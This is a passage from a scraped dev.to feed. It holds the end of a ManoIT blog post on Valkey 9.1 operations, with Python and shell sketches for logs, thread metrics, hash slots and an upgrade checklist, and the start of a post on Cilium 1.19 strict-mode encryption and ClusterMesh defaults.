&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"pid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"primary"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"14 May 2026 14:13:02.930"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"level"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"notice"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"Ready to accept connections tcp"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
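&lt;p&gt;Log pipelines like Loki do this filtering natively, but the structured format is also easy to work with directly. Below is a short Python sketch that filters lines like the ones above by minimum level. The severity order is an assumption: the sample only shows &lt;code&gt;notice&lt;/code&gt; and &lt;code&gt;warning&lt;/code&gt;, while &lt;code&gt;debug&lt;/code&gt; and &lt;code&gt;verbose&lt;/code&gt; are Valkey's other loglevel names.&lt;/p&gt;

```python
"""Filter Valkey JSON log lines (log-format json) by minimum level."""
import json
from typing import Iterable

# Assumed severity order, lowest first.
LEVELS = ["debug", "verbose", "notice", "warning"]


def filter_logs(lines: Iterable[str], min_level: str = "warning") -> list[dict]:
    threshold = LEVELS.index(min_level)
    entries = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue  # skip partial or non-JSON lines
        if not isinstance(entry, dict):
            continue
        level = entry.get("level")
        if level in LEVELS and LEVELS.index(level) >= threshold:
            entries.append(entry)
    return entries


if __name__ == "__main__":
    sample = [
        '{"pid":14500,"role":"primary","level":"notice","message":"Ready to accept connections tcp"}',
        '{"pid":14500,"role":"primary","level":"warning","message":"WARNING: The TCP backlog setting of 511 cannot be enforced..."}',
    ]
    for e in filter_logs(sample):
        print(e["level"], e["message"])
```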



&lt;p&gt;The other key item is &lt;strong&gt;main/IO thread usage metrics&lt;/strong&gt;. Valkey's threads busy-loop while waiting for work, so CPU can appear near 100% even when relatively idle — plain CPU metrics couldn't reveal true load. 9.1 adds cumulative usage metrics for the main and IO threads so you can measure "how busy is it really?" and tune accordingly. It's a direct basis for deciding whether to add IO threads (scale up).&lt;/p&gt;
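&lt;p&gt;Because the new metrics are cumulative, you derive utilization from the change between two samples divided by the elapsed wall time, the same way a Prometheus &lt;code&gt;rate()&lt;/code&gt; works. Below is a Python sketch of that arithmetic. This article does not give the actual &lt;code&gt;INFO&lt;/code&gt; field names and units. The sketch therefore assumes cumulative busy time in microseconds per thread and uses hypothetical thread names.&lt;/p&gt;

```python
"""Turn cumulative thread-busy counters into utilization between samples.

Assumes each sample holds cumulative busy time in microseconds per thread;
check the real INFO field names and units on Valkey 9.1.
"""
from dataclasses import dataclass


@dataclass
class Sample:
    wall_us: int              # wall-clock timestamp of the sample
    busy_us: dict[str, int]   # thread name -> cumulative busy time


def utilization(prev: Sample, cur: Sample) -> dict[str, float]:
    elapsed = cur.wall_us - prev.wall_us
    if not elapsed > 0:
        raise ValueError("samples must be in increasing time order")
    result = {}
    for thread, busy in cur.busy_us.items():
        delta = busy - prev.busy_us.get(thread, 0)
        # Clamp at 0 in case a counter reset (e.g. restart) between samples.
        result[thread] = max(delta, 0) / elapsed
    return result


if __name__ == "__main__":
    p = Sample(0, {"main": 0, "io_1": 100})
    c = Sample(1_000_000, {"main": 250_000, "io_1": 600_100})
    print(utilization(p, c))
```

&lt;p&gt;If the IO threads sit near 1.0 while the main thread has headroom, adding IO threads may help. The reverse pattern points at the main thread as the bottleneck.&lt;/p&gt;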

&lt;h2&gt;
  
  
  7. Revisiting the 9.0 Foundation — Atomic Slot Migration, Hash Field Expiration, Cluster Numbered DBs
&lt;/h2&gt;

&lt;p&gt;To use 9.1 well you must know the 9.0 foundation beneath it. The three pillars of 9.0 (2025-10-21) tie straight into operational stability.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.1 Atomic Slot Migration — from key-by-key to slot-by-slot
&lt;/h3&gt;

&lt;p&gt;Pre-9.0 cluster resharding was &lt;strong&gt;key-by-key move-then-delete&lt;/strong&gt;. If a client touched a key mid-migration, it didn't know which node held it, adding hops; in multi-key ops with keys split across two nodes, the client had to retry; and a huge collection key could exceed the target node's input buffer and block the migration outright. 9.0 atomically moves an &lt;strong&gt;entire slot (of 16,384) in AOF format&lt;/strong&gt;. The source node keeps all keys until the slot migration fully completes, so redirects, retries, and giant-key blocking disappear structurally. 9.1's valkey-cli uses this directly via the &lt;code&gt;--cluster-use-atomic-slot-migration&lt;/code&gt; flag on &lt;code&gt;--cluster rebalance&lt;/code&gt;/&lt;code&gt;--cluster reshard&lt;/code&gt;.&lt;/p&gt;
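&lt;p&gt;Which keys travel together in a slot migration is decided by the standard cluster key-to-slot mapping that Valkey inherited from Redis Cluster. The slot is the CRC16 (XMODEM variant) of the key, modulo 16,384. If the key contains a non-empty &lt;code&gt;{...}&lt;/code&gt; hash tag, only the body of the first such tag is hashed. Below is a pure-Python sketch; &lt;code&gt;CLUSTER KEYSLOT&lt;/code&gt; on a live node remains the authoritative answer.&lt;/p&gt;

```python
"""Compute the cluster hash slot of a key (CRC16/XMODEM mod 16384)."""

SLOTS = 16384


def crc16_xmodem(data: bytes) -> int:
    crc = 0
    for byte in data:
        crc ^= byte * 256  # move the byte into the high 8 bits
        for _ in range(8):
            # crc * 2 is a one-bit left shift; % 0x10000 keeps 16 bits.
            if crc >= 0x8000:
                crc = (crc * 2 % 0x10000) ^ 0x1021
            else:
                crc = crc * 2 % 0x10000
    return crc


def key_slot(key: str) -> int:
    raw = key.encode()
    # Hash tag rule: if the key has "{...}" with a non-empty body, only
    # the body of the first such tag is hashed.
    start = raw.find(b"{")
    if start != -1:
        end = raw.find(b"}", start + 1)
        if end != -1 and end != start + 1:
            raw = raw[start + 1:end]
    return crc16_xmodem(raw) % SLOTS


if __name__ == "__main__":
    for k in ["{user1000}.following", "{user1000}.followers", "session:abc"]:
        print(k, key_slot(k))
```

&lt;p&gt;Keys that share a hash tag, such as &lt;code&gt;{user1000}.following&lt;/code&gt; and &lt;code&gt;{user1000}.followers&lt;/code&gt;, land in one slot and therefore move in the same atomic migration. The same slot number is what the &lt;code&gt;SLOT&lt;/code&gt; filter of &lt;code&gt;CLUSTERSCAN&lt;/code&gt; takes.&lt;/p&gt;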

&lt;h3&gt;
  
  
  7.2 Hash Field Expiration — per-field TTL
&lt;/h3&gt;

&lt;p&gt;Hashes bundle many fields under one key, but pre-9.0 expiry was &lt;em&gt;all-or-nothing at the key level&lt;/em&gt;. Expiring only some fields required multi-key hacks, adding complexity and memory. 9.0 added a per-field TTL command family: &lt;code&gt;HEXPIRE&lt;/code&gt;, &lt;code&gt;HPEXPIRE&lt;/code&gt;, &lt;code&gt;HTTL&lt;/code&gt;, &lt;code&gt;HGETEX&lt;/code&gt;, &lt;code&gt;HSETEX&lt;/code&gt;, &lt;code&gt;HPERSIST&lt;/code&gt;, and more. Combined with 9.1's &lt;code&gt;HGETDEL&lt;/code&gt;, hash-based job queues and session stores become far cleaner.&lt;/p&gt;
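&lt;p&gt;The per-field behavior can be modeled in a few lines. The toy Python model below is not Valkey's implementation. Each field may carry its own deadline, and expired fields are dropped lazily on access. An &lt;code&gt;HTTL&lt;/code&gt;-style query returns -2 for a missing field and -1 for a field without a TTL, following the key-level &lt;code&gt;TTL&lt;/code&gt; convention; verify the exact return codes against the Valkey command docs. The clock is injected so the model can be tested without waiting.&lt;/p&gt;

```python
"""Toy model of per-field hash TTLs (HEXPIRE/HTTL-style) with lazy expiry."""
import math
from typing import Callable, Optional


class ExpiringHash:
    def __init__(self, clock: Callable[[], float]):
        self._clock = clock  # injected so tests can move time forward
        self._values: dict[str, str] = {}
        self._expires_at: dict[str, float] = {}

    def _purge(self, field: str) -> None:
        # Lazy expiry: drop the field once its deadline has passed.
        deadline = self._expires_at.get(field)
        if deadline is not None and self._clock() >= deadline:
            self._values.pop(field, None)
            del self._expires_at[field]

    def hset(self, field: str, value: str) -> None:
        self._purge(field)
        # This toy keeps an existing TTL on overwrite; the server's rule may differ.
        self._values[field] = value

    def hexpire(self, field: str, seconds: float) -> bool:
        self._purge(field)
        if field not in self._values:
            return False  # nothing to expire
        self._expires_at[field] = self._clock() + seconds
        return True

    def hget(self, field: str) -> Optional[str]:
        self._purge(field)
        return self._values.get(field)

    def httl(self, field: str) -> int:
        self._purge(field)
        if field not in self._values:
            return -2  # no such field
        if field not in self._expires_at:
            return -1  # field exists without a TTL
        # Remaining seconds, rounded up (a choice of this model).
        return math.ceil(self._expires_at[field] - self._clock())
```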

&lt;h3&gt;
  
  
  7.3 Other 9.0 improvements
&lt;/h3&gt;

&lt;p&gt;9.0 also delivered: &lt;strong&gt;1B RPS on a 2,000-node cluster&lt;/strong&gt; (large-cluster resilience), &lt;strong&gt;pipeline memory prefetch&lt;/strong&gt; (up to 40% throughput), &lt;strong&gt;zero-copy responses&lt;/strong&gt; (up to 20%), &lt;strong&gt;Multipath TCP&lt;/strong&gt; (up to 25% lower latency), &lt;strong&gt;SIMD for BITCOUNT and HyperLogLog&lt;/strong&gt; (up to 200%), polygon-based geospatial queries, conditional delete &lt;code&gt;DELIFEQ&lt;/code&gt;, &lt;code&gt;CLIENT LIST&lt;/code&gt; filtering, and restored usage recommendations for 25 previously deprecated commands. If 9.0 was "a leap in performance and features," 9.1 is "the security/observability/efficiency finish on top."&lt;/p&gt;

&lt;h2&gt;
  
  
  8. Operational Decisions — Upgrade / Migration Flow
&lt;/h2&gt;

&lt;p&gt;Below is the 9.1 adoption decision flow used by ManoIT's platform team.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart TD
    A[Current in-memory store] --&amp;gt; B{Engine?}
    B --&amp;gt;|Redis 7.2 or older OSS| C[Evaluate drop-in migration&amp;lt;br/&amp;gt;to BSD-3 Valkey 9.1]
    B --&amp;gt;|Valkey 8.x| D[9.1 minor upgrade]
    B --&amp;gt;|Redis 7.4+ SSPL| E[Decide after license policy review]
    C --&amp;gt; F{Use scripting?}
    D --&amp;gt; F
    F --&amp;gt;|No| G[Don't load Lua module&amp;lt;br/&amp;gt;shrink attack surface]
    F --&amp;gt;|Yes| H[Keep Lua module loaded]
    G --&amp;gt; I{Multi-tenant?}
    H --&amp;gt; I
    I --&amp;gt;|Yes| J[Consolidate instances via&amp;lt;br/&amp;gt;numbered DBs + per-db ACLs]
    I --&amp;gt;|No| K[Single-db operation]
    J --&amp;gt; L[Wire JSON logging + thread metrics&amp;lt;br/&amp;gt;into observability pipeline]
    K --&amp;gt; L
    L --&amp;gt; M[Validate in staging 2 weeks → gradual prod rollout]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  9. ManoIT Internal Adoption Checklist
&lt;/h2&gt;

&lt;p&gt;The checklist below turns the above into an internal operations procedure. ManoIT runs cache/session/ranking clusters in three tiers (dev/stage/prod) and validates even minor releases for two weeks in staging before prod.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory engine/version across all clusters (incl. Redis/Valkey mix)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Version matrix PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Audit Lua scripting usage — trace &lt;code&gt;EVAL&lt;/code&gt;/&lt;code&gt;EVALSHA&lt;/code&gt; calls&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Identify scripting-free clusters&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Upgrade dev cluster to 9.1 (keep Lua loaded, default config)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;INFO server&lt;/code&gt; reports &lt;code&gt;valkey_version:9.1.0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Client compatibility regression in dev — verify new commands/response changes&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Client SDK compatibility report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Design numbered DBs + per-db ACLs on multi-tenant candidate clusters&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Tenant↔db↔ACL mapping doc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Drop Lua module on scripting-free clusters&lt;/td&gt;
&lt;td&gt;Platform + Security&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;INFO scripting_engines&lt;/code&gt; = empty&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Enable JSON logging (&lt;code&gt;log-format json&lt;/code&gt;) → wire to Loki&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Structured log collection + dashboard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Expose main/IO thread usage metrics to Prometheus + alarms&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;IO-thread-saturation alarm fire/resolve test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Validate TLS auto-reload + cert-expiry metric, pilot SAN-URI mTLS&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Zero-downtime cert rotation verified&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Staging 9.1 upgrade + load test (&lt;code&gt;valkey-benchmark --warmup --duration&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Zero throughput/latency regression report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Standardize &lt;code&gt;--cluster-use-atomic-slot-migration&lt;/code&gt; on resharding&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Resharding runbook updated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Gradual prod upgrade (replica → primary, slot-level verification)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;All prod nodes 9.1.0 + zero-downtime availability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Measure real memory savings post-upgrade (small-string / sorted-set heavy clusters)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Before/after &lt;code&gt;used_memory&lt;/code&gt; comparison&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Validate rollback — 8.x downgrade path when new 9.1 commands are unused&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Rollback rehearsal passed&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
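
&lt;p&gt;Step 13's before/after comparison is easy to script. The sketch below is a minimal example. It assumes you capture &lt;code&gt;valkey-cli INFO memory&lt;/code&gt; on the same node under a comparable dataset, once before the upgrade and once after. The helper names &lt;code&gt;used_memory_from_info&lt;/code&gt; and &lt;code&gt;savings_pct&lt;/code&gt; are hypothetical, and the percentage uses integer arithmetic, so it truncates.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical helpers for the step-13 before/after used_memory comparison.

# Extract the used_memory value (bytes) from INFO memory text on stdin.
# The trailing .* also swallows the \r that INFO replies end with.
used_memory_from_info() {
  sed -n 's/^used_memory:\([0-9][0-9]*\).*/\1/p'
}

# Print the integer percentage saved going from $1 (before) to $2 (after) bytes.
# A negative result means memory use grew.
savings_pct() {
  local before=$1 after=$2
  if [ "$before" -le 0 ]; then
    echo "before must be positive"
    return 1
  fi
  echo $(( (before - after) * 100 / before ))
}

# Usage:
#   before=$(valkey-cli INFO memory | used_memory_from_info)   # before the upgrade
#   after=$(valkey-cli INFO memory | used_memory_from_info)    # after the upgrade
#   savings_pct "$before" "$after"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;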

&lt;h2&gt;
  
  
  10. Conclusion — A Minor Release That Made Security, Observability, and Efficiency the Operational Default
&lt;/h2&gt;

&lt;p&gt;To sum up 9.1 in one line: &lt;strong&gt;"on top of the performance and feature leap 9.0 delivered, it adds the operational finish that matters most: security, observability, and efficiency."&lt;/strong&gt; Per-database ACLs for numbered DBs open a path to multi-tenant isolation at database granularity without adding instances, and moving Lua into a module applies the zero-trust principle "turn off what you don't use" at the core. The new I/O threading model reached 2.1M RPS on a single server, and the 20% memory savings on small strings translate directly into lower cache costs. JSON logging and thread usage metrics close the observability gap you previously filled with sidecars and exporters. HGETDEL/MSETEX/CLUSTERSCAN collapse the round trips and transactions of common patterns into single commands.&lt;/p&gt;

&lt;p&gt;Three operational takeaways. (1) &lt;strong&gt;Audit Lua usage first&lt;/strong&gt;: dropping the module shrinks the attack surface, but a careless removal breaks any feature that relies on &lt;code&gt;EVAL&lt;/code&gt;. (2) &lt;strong&gt;Remember that numbered DBs are logical isolation&lt;/strong&gt;: per-db ACLs are powerful but do not provide physical isolation, so keep separate instances for regulated data. (3) &lt;strong&gt;Don't skip staging validation, even for a minor release&lt;/strong&gt;: 9.1 includes global behavior changes such as the hardware clock default and the new I/O threading model, so validate on unusual virtualization environments before rolling out. The shortest recommendation in this article: &lt;em&gt;"Upgrade dev to 9.1 this week, and open the security PR to drop the Lua module on your scripting-free clusters first."&lt;/em&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;ℹ️ This article was written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Valkey 9.1.0 release blog (valkey.io, May 19, 2026), the Valkey 9.0 GA blog (Oct 21, 2025), the Linux Foundation 9.1 release announcement (PRNewswire), Phoronix's 9.1 review, and the valkey-io/valkey GitHub release notes as primary sources. Command syntax, performance figures, and flag names reflect official docs as of publication (2026-05-29) and may change in future patches. Verify current status at valkey.io/commands and GitHub Releases before applying to production. The internal adoption example is adapted from ManoIT platform team's operational procedures.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1480274" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>database</category>
      <category>redis</category>
      <category>devops</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Cilium 1.19 Deep Dive — 10-Year Anniversary: IPsec/WireGuard Strict Mode, Ztunnel Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Thu, 28 May 2026 00:32:04 +0000</pubDate>
      <link>https://dev.to/x4nent/cilium-119-deep-dive-10-year-anniversary-ipsecwireguard-strict-mode-ztunnel-beta-4eo9</link>
      <guid>https://dev.to/x4nent/cilium-119-deep-dive-10-year-anniversary-ipsecwireguard-strict-mode-ztunnel-beta-4eo9</guid>
      <description>&lt;h1&gt;
  
  
  Cilium 1.19 Deep Dive — 10-Year Anniversary Release: IPsec/WireGuard Strict Mode, Ztunnel Transparent Encryption Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable, and Hubble Drop Tagging Redefining the 2026 eBPF Networking, Security, and Observability Standard
&lt;/h1&gt;

&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Cilium v1.19 (May 13, 2026) is the 10-year anniversary release and flips multiple defaults toward operational safety.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;IPsec / WireGuard strict mode&lt;/strong&gt; drops unencrypted traffic by default, ending best-effort encryption gaps.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ClusterMesh policy-default-local-cluster&lt;/strong&gt; is now the default — audit your existing NetworkPolicies before upgrading or you will silently cut multi-cluster traffic.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ztunnel Transparent Encryption (Beta)&lt;/strong&gt; brings sidecarless workload-identity mTLS to Cilium, interoperable with Istio Ambient.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Pool IPAM&lt;/strong&gt; graduates to Stable, &lt;strong&gt;Hubble&lt;/strong&gt; adds drop policy tagging + encrypted-flow filters + Trace IP Options, and Network Policy denials can now return &lt;strong&gt;ICMPv4 Destination Unreachable&lt;/strong&gt; to skip the 30-second TCP retry loop.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Ten years after its first commit, Cilium ships v1.19 as its anniversary release. v1.19.0 landed in mid-May 2026, and patches reached v1.19.4 within two weeks. There is no single flagship feature. Instead, six areas evolve at once to deliver on the promise of &lt;em&gt;"an eBPF dataplane you can actually operate quarter after quarter."&lt;/em&gt; (1) &lt;strong&gt;Strict modes&lt;/strong&gt; for IPsec and WireGuard turn node-to-node encryption from best-effort into a hard requirement. (2) &lt;strong&gt;Ztunnel Transparent Encryption&lt;/strong&gt; lands as a beta integration, adding a sidecarless workload-identity encryption path alongside node-level encryption. (3) ClusterMesh &lt;strong&gt;policy-default-local-cluster&lt;/strong&gt; becomes the new default, structurally blocking the "I wrote a local policy that quietly fanned out across the mesh" class of incidents. (4) &lt;strong&gt;Multi-Pool IPAM&lt;/strong&gt; graduates from Beta to Stable and now works with IPsec and direct routing. (5) Hubble adds &lt;strong&gt;drop event policy tagging&lt;/strong&gt;, &lt;strong&gt;encrypted-flow filters&lt;/strong&gt;, and &lt;strong&gt;Trace IP Options&lt;/strong&gt;, so "why was this packet dropped?" can be answered with one command. (6) Network Policy denials can now return &lt;strong&gt;ICMPv4 Destination Unreachable&lt;/strong&gt;, so clients fail fast instead of sitting through a 30-second TCP retry loop. This article breaks down the root cause of each change at the eBPF datapath, policy compilation, and CRD schema levels. It then lays out the nine-step upgrade, observation, and rollback playbook ManoIT applied across three internal Kubernetes clusters (prod / stage / dev).&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 2026's v1.19 is an inflection point for Cilium
&lt;/h2&gt;

&lt;p&gt;Cilium started in April 2016 when Thomas Graf rewrote the Kubernetes dataplane in eBPF instead of iptables. v1.0 in 2018, CNCF Sandbox in 2019, Incubating in 2021, and Graduated in October 2023 — by now Cilium is the dataplane behind or recommended by GKE Dataplane v2, EKS Anywhere, OpenShift, Talos Linux, K3s, and most other major Kubernetes distributions. &lt;strong&gt;v1.19 is the inflection point where the 10-year anniversary symbolism meets a deliberate maintainer pivot: "operational safety nets become the default."&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2016.04&lt;/td&gt;
&lt;td&gt;Cilium first commit (Thomas Graf)&lt;/td&gt;
&lt;td&gt;eBPF-based K8s dataplane launches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2018.04&lt;/td&gt;
&lt;td&gt;v1.0 — Production-ready&lt;/td&gt;
&lt;td&gt;"L7 visibility + identity-based" model settles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2019.06&lt;/td&gt;
&lt;td&gt;CNCF Sandbox accepted&lt;/td&gt;
&lt;td&gt;Community governance stage 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2021.10&lt;/td&gt;
&lt;td&gt;CNCF Incubating&lt;/td&gt;
&lt;td&gt;Hubble · ClusterMesh stabilization era&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2023.10&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CNCF Graduated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enterprise adoption guidelines formalized&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024.04&lt;/td&gt;
&lt;td&gt;v1.16 — Gateway API Beta, Multi-Pool IPAM Beta&lt;/td&gt;
&lt;td&gt;Service mesh + multi-CIDR operations activated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.05&lt;/td&gt;
&lt;td&gt;v1.17 — Gateway API GA, BGPv2 Stable&lt;/td&gt;
&lt;td&gt;Accelerated Ingress NGINX retirement flow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.10&lt;/td&gt;
&lt;td&gt;v1.18 — ClusterMesh API server v2, KVStoreMesh stable&lt;/td&gt;
&lt;td&gt;Simplified large-scale multi-cluster control plane&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.13&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;v1.19 — Strict Mode, Ztunnel Beta, policy-default-local-cluster, Multi-Pool IPAM Stable, Hubble drop tagging, ICMP friendly deny&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Operational safety nets become the default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.27&lt;/td&gt;
&lt;td&gt;v1.19.4 patch release&lt;/td&gt;
&lt;td&gt;Rapid 1.19.x patch stabilization in progress&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two messages matter for operators. (1) &lt;em&gt;"Default changes are the biggest changes."&lt;/em&gt; ClusterMesh's policy-default-local-cluster flipping from false to true is not a feature addition. It &lt;strong&gt;flips the default safety posture of multi-cluster policy&lt;/strong&gt;. (2) &lt;em&gt;"Strict mode is the fastest path through a compliance audit."&lt;/em&gt; Once IPsec or WireGuard runs in strict mode, traffic that cannot be encrypted is dropped instead of being sent. The "we encrypted, but some packets leaked in plaintext" audit finding therefore disappears structurally.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. IPsec/WireGuard Strict Mode — best-effort encryption becomes hard requirement
&lt;/h2&gt;

&lt;p&gt;This is the longest section in the v1.19 release notes. Cilium's transparent encryption has supported IPsec since v1.4 and WireGuard since v1.10, but both modes were &lt;strong&gt;best-effort&lt;/strong&gt;: "encrypt where we can, fall back to plaintext when peer keys aren't established or the protocol can't negotiate." That fallback was the most common finding in security audits.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Three gaps of the best-effort era
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;v1.18 behavior&lt;/th&gt;
&lt;th&gt;Audit verdict&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;New node joins cluster, key exchange still in progress&lt;/td&gt;
&lt;td&gt;Plaintext until key negotiation completes, then encryption&lt;/td&gt;
&lt;td&gt;"Plaintext window exists" finding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WireGuard peer key missing on a discovered node&lt;/td&gt;
&lt;td&gt;Plaintext fallback&lt;/td&gt;
&lt;td&gt;"Cannot enforce encryption" finding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPsec XFRM policy partially expired (SPI rotation)&lt;/td&gt;
&lt;td&gt;Plaintext fallback during renegotiation&lt;/td&gt;
&lt;td&gt;"Plaintext traffic visible in audit log" finding&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.2 v1.19 fix — strict mode drops unencrypted traffic
&lt;/h3&gt;

